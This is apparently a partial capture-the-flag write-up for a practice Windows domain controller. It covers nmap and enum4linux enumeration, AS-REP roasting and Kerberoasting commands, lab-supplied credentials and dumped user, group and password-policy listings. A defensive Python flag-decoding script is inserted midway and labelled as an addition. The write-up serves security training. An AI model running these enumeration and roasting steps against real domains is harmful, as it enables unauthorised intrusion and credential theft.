Certified (Windows · Medium)

Reconnaissance

┌──(root㉿P00075445-006)-[/home/surckers]
└─# nmap -p 53,88,135,139,389,445,464,592,636,3268,3269,9389,49666,49668,49685,49686,49689,49716,61104 -sCV --min-rate=10000 10.129.231.186
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-11 11:15 KST
Nmap scan report for 10.129.231.186
Host is up (0.29s latency).

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-11 09:15:54Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2024-11-11T09:17:29+00:00; +7h00m00s from scanner time.
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
592/tcp   filtered eudora-set
636/tcp   open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2024-11-11T09:17:30+00:00; +7h00m00s from scanner time.
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-11T09:17:29+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
3269/tcp  open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-11T09:17:30+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
9389/tcp  open     mc-nmf        .NET Message Framing
49666/tcp open     msrpc         Microsoft Windows RPC
49668/tcp open     msrpc         Microsoft Windows RPC
49685/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49686/tcp open     msrpc         Microsoft Windows RPC
49689/tcp open     msrpc         Microsoft Windows RPC
49716/tcp open     msrpc         Microsoft Windows RPC
61104/tcp open     msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-11-11T09:16:49
|_  start_date: N/A
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.64 seconds

 

Various attempts

# enum4linux -a 10.129.231.186
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Nov 11 13:54:59 2024

 =========================================( Target Information )=========================================

Target ........... 10.129.231.186
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 10.129.231.186 )===========================


[E] Can't find workgroup/domain



 ===============================( Nbtstat Information for 10.129.231.186 )===============================

Looking up status of 10.129.231.186
No reply from 10.129.231.186

 ==================================( Session Check on 10.129.231.186 )==================================


[+] Server 10.129.231.186 allows sessions using username '', password ''


 ===============================( Getting domain SID for 10.129.231.186 )===============================

Domain Name: CERTIFIED
Domain Sid: S-1-5-21-729746778-2675978091-3820388244

[+] Host is part of a domain (not a workgroup)


 ==================================( OS information on 10.129.231.186 )==================================


[E] Can't get OS info with smbclient


[+] Got OS info for 10.129.231.186 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED


 ======================================( Users on 10.129.231.186 )======================================


[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED



[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED


 ================================( Share Enumeration on 10.129.231.186 )================================

do_connect: Connection to 10.129.231.186 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.129.231.186


 ===========================( Password Policy Information for 10.129.231.186 )===========================


[E] Unexpected error from polenum:



[+] Attaching to 10.129.231.186 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Cannot request session (Called Name:10.129.231.186)

[+] Trying protocol 445/SMB...

        [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.



[E] Failed to get password policy with rpcclient



 ======================================( Groups on 10.129.231.186 )======================================


[+] Getting builtin groups:


[+]  Getting builtin group memberships:


[+]  Getting local groups:


[+]  Getting local group memberships:


[+]  Getting domain groups:


[+]  Getting domain group memberships:


 =================( Users on 10.129.231.186 via RID cycling (RIDS: 500-550,1000-1050) )=================


[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.


 ==============================( Getting printer info for 10.129.231.186 )==============================

do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Mon Nov 11 13:56:10 2024

 

└─# echo -e "Administrator\nguest\nkrbtgt\nadmin\nbackup\nsupport\ntest\nuser\nhelpdesk\nmanager\nITadmin\nsqlservice\nwebadmin" > users.txt

┌──(root㉿P00075445-006)-[/home/surckers]
└─# impacket-GetNPUsers certified.htb/ -dc-ip 10.129.231.186 -no-pass -usersfile users.txt
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
└─# smbclient //10.129.231.186/IPC$ -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> rpcclient
rpcclient: command not found
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> help
?              allinfo        altname        archive        backup
blocksize      cancel         case_sensitive cd             chmod
chown          close          del            deltree        dir
du             echo           exit           get            getfacl
geteas         hardlink       help           history        iosize
lcd            link           lock           lowercase      ls
l              mask           md             mget           mkdir
mkfifo         more           mput           newer          notify
open           posix          posix_encrypt  posix_open     posix_mkdir
posix_rmdir    posix_unlink   posix_whoami   print          prompt
put            pwd            q              queue          quit
readlink       rd             recurse        reget          rename
reput          rm             rmdir          showacls       setea
setmode        scopy          stat           symlink        tar
tarmode        timeout        translate      unlock         volume
vuid           wdel           logon          listconnect    showconnect
tcon           tdis           tid            utimes         logoff

This one works.

 

┌──(root㉿P00075445-006)-[/home/surckers]
└─# smbclient -L //10.129.231.186 -N --option='client min protocol=SMB2'
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available


┌──(root㉿P00075445-006)-[/home/surckers]
└─# smbclient -L //10.129.231.186 -N
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.231.186 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

 

┌──(root㉿P00075445-006)-[/home/surckers]
└─# dig axfr @10.129.231.186 certified.htb

; <<>> DiG 9.19.21-1+b1-Debian <<>> axfr @10.129.231.186 certified.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
┌──(root㉿P00075445-006)-[/home/surckers]
└─# rpcclient -U "" 10.129.231.186
Password for [WORKGROUP\]:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

 

└─# ldapsearch -x -H ldap://10.129.231.186 -b "dc=certified,dc=htb"
# extended LDIF
#
# LDAPv3
# base <dc=certified,dc=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090C77, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1

 

The account credentials were there all along... unbelievable.

judith.mader / judith09

┌──(root㉿P00075445-006)-[/usr/lib/python3/dist-packages/impacket/krb5/Certipy]
└─# enum4linux -a -u judith.mader -p judith09 10.129.68.181
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Nov 12 19:33:27 2024

 =========================================( Target Information )=========================================

Target ........... 10.129.68.181
RID Range ........ 500-550,1000-1050
Username ......... 'judith.mader'
Password ......... 'judith09'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 10.129.68.181 )===========================


[E] Can't find workgroup/domain



 ===============================( Nbtstat Information for 10.129.68.181 )===============================

Looking up status of 10.129.68.181
No reply from 10.129.68.181

 ===================================( Session Check on 10.129.68.181 )===================================


[+] Server 10.129.68.181 allows sessions using username 'judith.mader', password 'judith09'


 ================================( Getting domain SID for 10.129.68.181 )================================

Domain Name: CERTIFIED
Domain Sid: S-1-5-21-729746778-2675978091-3820388244

[+] Host is part of a domain (not a workgroup)


 ==================================( OS information on 10.129.68.181 )==================================


[E] Can't get OS info with smbclient


[+] Got OS info for 10.129.68.181 from srvinfo:
        10.129.68.181  Wk Sv PDC Tim NT
        platform_id     :       500
        os version      :       10.0
        server type     :       0x80102b


 =======================================( Users on 10.129.68.181 )=======================================

index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/domain
index: 0xfec RID: 0x641 acb: 0x00000210 Account: alexander.huges        Name: Alexander Huges   Desc: (null)
index: 0xfb4 RID: 0x452 acb: 0x00000210 Account: ca_operator    Name: Operator CA       Desc: (null)
index: 0xfee RID: 0x643 acb: 0x00000210 Account: gregory.cameron        Name: Gregory Cameron   Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0xfed RID: 0x642 acb: 0x00000210 Account: harry.wilson   Name: Harry Wilson      Desc: (null)
index: 0xfb1 RID: 0x44f acb: 0x00000210 Account: judith.mader   Name: Judith Mader      Desc: (null)
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0xfb3 RID: 0x451 acb: 0x00000210 Account: management_svc Name: management service        Desc: (null)

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[judith.mader] rid:[0x44f]
user:[management_svc] rid:[0x451]
user:[ca_operator] rid:[0x452]
user:[alexander.huges] rid:[0x641]
user:[harry.wilson] rid:[0x642]
user:[gregory.cameron] rid:[0x643]

 =================================( Share Enumeration on 10.129.68.181 )=================================

do_connect: Connection to 10.129.68.181 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.129.68.181

//10.129.68.181/ADMIN$  Mapping: DENIED Listing: N/A Writing: N/A
//10.129.68.181/C$      Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:

NT_STATUS_NO_SUCH_FILE listing \*
//10.129.68.181/IPC$    Mapping: N/A Listing: N/A Writing: N/A
//10.129.68.181/NETLOGON        Mapping: OK Listing: OK Writing: N/A
//10.129.68.181/SYSVOL  Mapping: OK Listing: OK Writing: N/A

 ===========================( Password Policy Information for 10.129.68.181 )===========================



[+] Attaching to 10.129.68.181 using judith.mader:judith09

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Cannot request session (Called Name:10.129.68.181)

[+] Trying protocol 445/SMB...

[+] Found domain(s):

        [+] CERTIFIED
        [+] Builtin

[+] Password Info for Domain: CERTIFIED

        [+] Minimum password length: 7
        [+] Password history length: 24
        [+] Maximum password age: 41 days 23 hours 53 minutes
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: 1 day 4 minutes
        [+] Reset Account Lockout Counter: 10 minutes
        [+] Locked Account Duration: 10 minutes
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: Not Set



[+] Retieved partial password policy with rpcclient:


Password Complexity: Disabled
Minimum Password Length: 7


 ======================================( Groups on 10.129.68.181 )======================================


[+] Getting builtin groups:

group:[Server Operators] rid:[0x225]
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]

[+]  Getting builtin group memberships:

Group: Remote Management Users' (RID: 580) has member: CERTIFIED\management_svc
Group: Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group: Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group: Users' (RID: 545) has member: CERTIFIED\Domain Users
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: NT AUTHORITY\Authenticated Users
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: CERTIFIED\DC01$
Group: Windows Authorization Access Group' (RID: 560) has member: NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Group: Certificate Service DCOM Access' (RID: 574) has member: NT AUTHORITY\Authenticated Users
Group: Print Operators' (RID: 550) has member: Could not initialise pipe samr. Error was NT_STATUS_INVALID_NETWORK_RESPONSE
Group: Guests' (RID: 546) has member: CERTIFIED\Guest
Group: Guests' (RID: 546) has member: CERTIFIED\Domain Guests
Group: Administrators' (RID: 544) has member: CERTIFIED\Administrator
Group: Administrators' (RID: 544) has member: CERTIFIED\Enterprise Admins
Group: Administrators' (RID: 544) has member: CERTIFIED\Domain Admins

[+]  Getting local groups:

group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]

[+]  Getting local group memberships:

Group: Denied RODC Password Replication Group' (RID: 572) has member: CERTIFIED\krbtgt
Group: Denied RODC Password Replication Group' (RID: 572) has member: CERTIFIED\Domain Controllers
Group: Denied RODC Password Replication Group' (RID: 572) has member: CERTIFIED\Schema Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: CERTIFIED\Enterprise Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: CERTIFIED\Cert Publishers
Group: Denied RODC Password Replication Group' (RID: 572) has member: CERTIFIED\Domain Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: CERTIFIED\Group Policy Creator Owners
Group: Denied RODC Password Replication Group' (RID: 572) has member: CERTIFIED\Read-only Domain Controllers
Group: Cert Publishers' (RID: 517) has member: CERTIFIED\DC01$

[+]  Getting domain groups:

group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Management] rid:[0x450]

[+]  Getting domain group memberships:

Group: 'Management' (RID: 1104) has member: CERTIFIED\management_svc
Group: 'Schema Admins' (RID: 518) has member: CERTIFIED\Administrator
Group: 'Domain Guests' (RID: 514) has member: CERTIFIED\Guest
Group: 'Group Policy Creator Owners' (RID: 520) has member: CERTIFIED\Administrator
Group: 'Domain Admins' (RID: 512) has member: CERTIFIED\Administrator
Group: 'Domain Users' (RID: 513) has member: CERTIFIED\Administrator
Group: 'Domain Users' (RID: 513) has member: CERTIFIED\krbtgt
Group: 'Domain Users' (RID: 513) has member: CERTIFIED\judith.mader
Group: 'Domain Users' (RID: 513) has member: CERTIFIED\management_svc
Group: 'Domain Users' (RID: 513) has member: CERTIFIED\ca_operator
Group: 'Domain Users' (RID: 513) has member: CERTIFIED\alexander.huges
Group: 'Domain Users' (RID: 513) has member: CERTIFIED\harry.wilson
Group: 'Domain Users' (RID: 513) has member: CERTIFIED\gregory.cameron
Group: 'Enterprise Admins' (RID: 519) has member: CERTIFIED\Administrator
Group: 'Domain Controllers' (RID: 516) has member: CERTIFIED\DC01$

 ==================( Users on 10.129.68.181 via RID cycling (RIDS: 500-550,1000-1050) )==================


[I] Found new SID:
S-1-5-21-729746778-2675978091-3820388244

[I] Found new SID:
S-1-5-21-729746778-2675978091-3820388244

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[+] Enumerating users using SID S-1-5-82-3006700770-424185619-1745488364-794895919 and logon username 'judith.mader', password 'judith09'


[+] Enumerating users using SID S-1-5-80-3139157870-2983391045-3678747466-658725712 and logon username 'judith.mader', password 'judith09'


[+] Enumerating users using SID S-1-5-32 and logon username 'judith.mader', password 'judith09'

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-5-90 and logon username 'judith.mader', password 'judith09'
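
Added example (not part of the original post): the `acb:` column in the user listing above is the SAMR account-control bitmask, and together with the password policy block it can be reviewed mechanically. The sketch below decodes both from lines copied out of that output; `MIN_LENGTH_BASELINE` and the `REVIEW` set are assumptions chosen for illustration.

```python
import re

# MS-SAMR USER_ACCOUNT control bits: the meaning of enum4linux's "acb:" column.
ACB_BITS = [
    (0x00001, "DISABLED"), (0x00002, "HOME_DIRECTORY_REQUIRED"),
    (0x00004, "PASSWORD_NOT_REQUIRED"), (0x00008, "TEMP_DUPLICATE_ACCOUNT"),
    (0x00010, "NORMAL_ACCOUNT"), (0x00020, "MNS_LOGON_ACCOUNT"),
    (0x00040, "INTERDOMAIN_TRUST_ACCOUNT"), (0x00080, "WORKSTATION_TRUST_ACCOUNT"),
    (0x00100, "SERVER_TRUST_ACCOUNT"), (0x00200, "DONT_EXPIRE_PASSWORD"),
    (0x00400, "ACCOUNT_AUTO_LOCKED"), (0x00800, "ENCRYPTED_TEXT_PASSWORD_ALLOWED"),
    (0x01000, "SMARTCARD_REQUIRED"), (0x02000, "TRUSTED_FOR_DELEGATION"),
    (0x04000, "NOT_DELEGATED"), (0x08000, "USE_DES_KEY_ONLY"),
    (0x10000, "DONT_REQUIRE_PREAUTH"), (0x20000, "PASSWORD_EXPIRED"),
]
# Assumption: flags worth a hygiene review on an account.
REVIEW = {"PASSWORD_NOT_REQUIRED", "DONT_EXPIRE_PASSWORD",
          "ENCRYPTED_TEXT_PASSWORD_ALLOWED", "TRUSTED_FOR_DELEGATION",
          "USE_DES_KEY_ONLY", "DONT_REQUIRE_PREAUTH"}
MIN_LENGTH_BASELINE = 14  # assumption: substitute your organisation's baseline

# Lines taken from the enum4linux output above (Desc fields dropped).
SAMPLE = """\
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)
index: 0xfb1 RID: 0x44f acb: 0x00000210 Account: judith.mader   Name: Judith Mader
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null)
index: 0xfb3 RID: 0x451 acb: 0x00000210 Account: management_svc Name: management service
        [+] Minimum password length: 7
                [+] Domain Password Complex: 0
        [+] Account Lockout Threshold: None
"""

def decode_acb(value):
    """Return flag names for an acb value, lowest bit first."""
    names = [name for bit, name in ACB_BITS if value & bit]
    leftover = value & ~sum(bit for bit, _ in ACB_BITS)
    if leftover:
        names.append(f"UNDECODED_{leftover:#x}")
    return names

def audit_accounts(text):
    """Map account name -> enabled state, decoded flags and flags to review."""
    report = {}
    for m in re.finditer(r"acb: (0x[0-9a-fA-F]+) Account: (\S+)", text):
        flags = decode_acb(int(m.group(1), 16))
        report[m.group(2)] = {
            "enabled": "DISABLED" not in flags,
            "flags": flags,
            "review": [f for f in flags if f in REVIEW],
        }
    return report

def audit_policy(text):
    """Return findings for the domain password policy block."""
    findings = []
    length = re.search(r"Minimum password length: (\d+)", text)
    if length and int(length.group(1)) < MIN_LENGTH_BASELINE:
        findings.append(f"minimum length {length.group(1)} < {MIN_LENGTH_BASELINE}")
    if re.search(r"Domain Password Complex: 0", text):
        findings.append("complexity disabled")
    if re.search(r"Account Lockout Threshold: None", text):
        findings.append("no lockout threshold")
    return findings

if __name__ == "__main__":
    for account, info in audit_accounts(SAMPLE).items():
        state = "enabled" if info["enabled"] else "disabled"
        print(f"{account:15} {state:9} {', '.join(info['flags'])}")
    for finding in audit_policy(SAMPLE):
        print("policy:", finding)
```

Guest and krbtgt decode as DISABLED, which matches the two KDC_ERR_CLIENT_REVOKED responses GetNPUsers returned for them earlier. Every enabled account listed carries DONT_EXPIRE_PASSWORD.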

 

The Kerberoasting attack yielded a TGS ticket, but it could not be cracked.

python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py certified.htb/judith.mader:judith09 -dc-ip 10.129.68.181 -request
